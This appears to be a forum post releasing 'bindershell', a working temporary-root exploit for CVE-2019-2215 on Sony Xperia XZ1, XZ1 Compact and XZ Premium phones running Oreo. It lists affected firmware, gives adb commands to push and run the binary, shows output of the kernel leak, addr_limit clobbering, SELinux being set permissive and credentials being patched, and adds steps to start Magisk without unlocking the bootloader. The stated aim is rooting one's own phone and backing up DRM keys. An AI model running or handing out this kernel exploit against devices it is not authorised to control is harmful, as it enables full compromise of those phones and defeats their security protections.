Let me present a temp root exploit for Sony Xperia XZ1 Compact / XZ1 / XZ Premium phones running Android Oreo firmware.
The exploit uses CVE-2019-2215, which gets you a temporary root shell very quickly and reliably (it's nearly instant).
- XZ1 Compact
  - G8441_47.1.A.8.49 (tested myself)
  - G8441_47.1.A.16.20 (tested myself)
- XZ Premium
- Xperia XZ1
  - G8343_47.1.A.12.150 (Freedom Canada)
  - G8343_47.1.A.12.205 (Freedom Canada)
  - SO-01K_47.1.F.1.105 (Docomo Japan)
  - SOV36_47.1.C.9.106 (AU Japan)
- Xperia XZ1 Compact
  - SO-02K_47.1.F.1.105 (Docomo Japan)
- XZ Premium
  - SO-04J_47.1.F.1.105 (Docomo Japan)
This is an alternative to my earlier renoroot exploit release for getting a temp root shell for a TA (DRM keys) backup.
I've also implemented a script to start up Magisk from the temp root shell, so this can be used nicely with still-locked phones on the latest Oreo firmware to enable Magisk root without unlocking the bootloader. You still cannot modify anything in the /system or /vendor partitions because of dm-verity, but you can use it for other useful things, for example an iptables-based firewall.
The listed firmware versions can be found, for example, here:
- to get a simple temp root shell
just download bindershell.zip, unzip it, 'adb push bindershell /data/local/tmp' and get temp root:
G8441:/ $ cd /data/local/tmp
G8441:/data/local/tmp $ chmod 755 ./bindershell
G8441:/data/local/tmp $ ./bindershell
bindershell - temp root shell for xperia XZ1c/XZ1/XZp using CVE-2019-2215
https://github.com/j4nn/renoshell/tree/CVE-2019-2215
MAIN: starting exploit for devices with waitqueue at 0x98
PARENT: Reading leaked data
PARENT: leaking successful
MAIN: thread_info should be in stack
MAIN: parsing kernel stack to find thread_info
PARENT: Reading leaked data
PARENT: Reading extra leaked data
PARENT: leaking successful
MAIN: task_struct_ptr = ffffffecc9691b00
MAIN: thread_info_ptr = ffffffecc4c34000
MAIN: Clobbering addr_limit
MAIN: should have stable kernel R/W now
kaslr slide 0x1d35200000
selinux set to permissive
current task credentials patched
got root, start shell...
G8441:/data/local/tmp #
- for temp root with magisk setup
do as in the previous option, additionally download magisk-setup-from-exploit.zip and Magisk-v19.3-Manager-v7.1.2.zip, unzip both and run the following commands as well (skip starting bindershell from the previous section):
adb install MagiskManager-v7.1.2.apk
adb push Magisk-v19.3 /data/local/tmp
adb shell 'cd /data/local/tmp/Magisk-v19.3 ; chmod 755 * ; /system/bin/sh ./update-binary -x ; ./magiskinit -x magisk magisk'
adb push magisk-setup.sh /data/local/tmp
adb shell chmod 755 /data/local/tmp/magisk-setup.sh
The above copies the needed files to your phone.
Then, after each boot, you can use the following command to start up Magisk via the exploit:
adb shell 'cd /data/local/tmp ; ./bindershell -c ./magisk-setup.sh'
Source code for the exploit (bindershell) is available here:
The Magisk startup script is obviously already in source form inside the attached magisk-setup-from-exploit.zip archive.
The Magisk binaries packed in Magisk-v19.3-Manager-v7.1.2.zip are the unmodified upstream releases of Magisk-v19.3.zip and MagiskManager-v7.1.2.apk; only the needed components were extracted and combined into a single archive.
It might be possible to use other versions (v19.3+), but that has not been tested and is not supported in any way.
Thanks to @arpruss for the su98 exploit variant (where the binder_thread wait queue is at offset 0x98 instead of 0xa0, which needed a completely different approach than the original exploit); the core of that exploit, up to the kernel-space r/w primitives, has been used here.